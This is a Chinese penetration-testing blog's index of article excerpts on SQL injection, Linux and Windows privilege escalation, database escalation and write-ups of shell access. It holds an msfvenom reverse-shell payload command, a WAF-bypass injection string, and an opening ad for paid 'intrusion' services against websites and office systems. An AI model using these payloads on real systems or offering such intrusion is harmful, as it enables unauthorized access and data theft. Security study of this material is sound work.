-
[站外广告]业务列表介绍和一般分类
业务列表介绍和一般分类:类别:攻击入侵破解开发1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量]2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。[接受授权的业务] ...
-
SQL注入篇之 mysql+php 延时注入
延时注入属于盲注入的一种,这种注入通过mysql里面的sleep(函数,这个函数的意思是延时执行多少秒。sleep通常与if一起使用例如selectif('root'='root',sleep(3,0如果字符串root等于root数据库延时3秒否则输出0延时方法是先获取数据的长...
-
从官方文档到0day挖掘思路
开篇废话我很喜欢ASRC某位大佬说过的一句话:挖洞的本质就是信息收集。一些开源项目的官方文档我们可以挖掘到很多有用信息,比如API利用、默认口令、硬编码等。本文主要以提供思路为目的,现在网上已经公开xxl-job未授权rce漏洞。在GitHub上能看到xxl-job与官网公开的文档。首先我们先通过官...
-
LINUX 内核漏洞提权
1、简介通常我们在拥有一个webshell的时候,一般权限都是WEB容器权限,如在iis就是iis用户组权限,在apache就是apache权限,一般都是权限较低,均可执行一些普通命令,如查看当前用户,网络信息,ip信息等。如果我想进行内网渗透就必须将权限提权到最高,如系统权限超级管理员权限。2...
-
LINUX SUID提权
1、简介SUID是一种特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行。SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限(仅对拥有执行权限的二进制程序有效)。例如,所有用户都可以执行passwd命令来修改自己的用户密码,而用户密码保存在/etc/...
-
Windows系统溢出提权
1、简介window服务器常用的是win2003win2008win2012在渗透测试中,我们获取的权限是iis_user用户组,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。2、程序权限的对比在iis里面权限依次的...
-
mysql udf 提权
1、简介在mysql可以使用自定义函数进行提权,udf=userdefinedfunction用户自定义函数对于自定义的函数在mysql5.1版本以后就需要放在插件插件目录/lib/plugin,文件后缀微dll,c语言编写2、插件目录可以使用语句查询plugin插件目录sho...
-
Sqlserver提权
1、简介如果网站里面使用的数据库是sqlserver那么如果找到sa的密码,利用提权脚本,执行命令,但是不一定的系统权限,还要看管理员开始安装sqlserver的权限设置。2、查找帐号和密码web.configconfig.aspconn.aspxdatabase.aspx3、开启xp_cmd...
-
zend nc 提权
1、简介在php里面有一个扩展是zend这个是用解析phpzend脚本加密文件。如果服务器安装了zend如果ZendExtensionManager.dll权限可以修改,那就可以用其他dl替换这dll文件。查找ZendExtensionManager.dllC:\ZkeysSoft\Zen...
-
zend反弹shell提权
这篇是接着上篇内容所说。Zend_DLL_Hijacking.exe执行远控msfconsole生成反弹shell生成攻击载荷msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.0.106lport=12345-fexe&...
-
FileZilla 提权
1、简介FileZilla是一个ftp服务器,假如配置不严的,读取xml密码可以执行一些简答的命令默认安装目录C:\ProgramFiles\FileZillaServer\2、提权FileZillaServerInterface.xml<FileZ...
-
msf结合漏洞审计工具进行提权
1、windows补丁审计工具使用在终端下可以使用命令systeminfo来查看系统的一些补丁信息http://www.demo1.com/asp.aspx补丁检测Windows-Exploit-Suggesterhttps://github.com/GDSSecurity/Windows...
-
渗透测试工具实战技巧合集
最好的NMAP扫描策略#适用所有大小网络最好的nmap扫描策略#主机发现,生成存活主机列表$nmap-sn-T4-oGDiscovery.gnmap192.168.56.0/24$grep"Status:Up"Discovery.gnmap|cut-f2-...
-
最新过安全狗注入语句
union%23muxue%0Aselect%23mux%0A1,2,group_concat(table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18frominformation_schema.tableswheretable_schema='j...
-
记一次阿里云主机泄露Access Key到Getshell
0x01前言此次渗透为一次授权渗透测试,门户网站找出了一堆不痛不痒的小漏洞,由于门户网站敏感特征太多而且也没什么特殊性就没有截图了,后台则是根据经验找出并非爆破目录,涉及太多敏感信息也省略了,我们就从后台开始。PS:本文仅用于技术讨论,严禁用于任何非法用途,违者后果自负。0x02正文拿到网站...
-
记一次不出网的渗透测试
前言周末时间中午吃饱喝足后,闲着无聊上线玩了几把游戏,听着音乐,本想周末就这样悠闲的过的,怎么老输,开始键盘侠上线,没办法,人菜又瘾大。PS:本文仅用于技术讨论,严禁用于非法用途,违者后果自负,与本站及作者无关。S2-046打点突然手机微信响了下,说有个测试,要开始干活。给一了个IP地址,先是进行...
-
细说渗透江湖之披荆斩棘
前言说来话长,在一个月黑风高的晚上,突然接到一个渗透任务,貌似还挺急,在客户充分授权的情况下,便连夜进行测试。由于本次渗透时间紧任务重,以拿权限为主,信息收集时需要格外仔细,端口、C段、指纹、路径、fofa、目录、github、网盘等等,有关信息进行收集,当然了403,404,nginx等页面也是...
-
前端JavaScript渗透测试步步为营
细心到极致方可不错失漏洞。事情起因在某次难度较高的众测项目中,笔者遇到了一个看起来”绝对安全的系统“,项目上线几天后此系统仍然没有被测试出漏洞,在没有系统功能、各种访问404的、没有测试账户的情况下,仍然揪出了隐藏在角落的漏洞,获得了高额赏金,算是在挖洞的道路上越走越远了,哈哈~本文分享在此漏洞挖掘...
-
包含文件结合phpinfo反弹交互shell
1.简介在PHP文件包含漏洞中,当我们找不到用于触发RCE的有效文件时,如果存在PHPINFO(它可以告诉我们临时文件的随机生成的文件名及其位置),我们可能可以包含一个临时文件来利用它。当向PHP发送POST请求并且请求包含一个文件块时,PHP会将所发送的文件保存到一个临时文件中(通常是/tmp/P...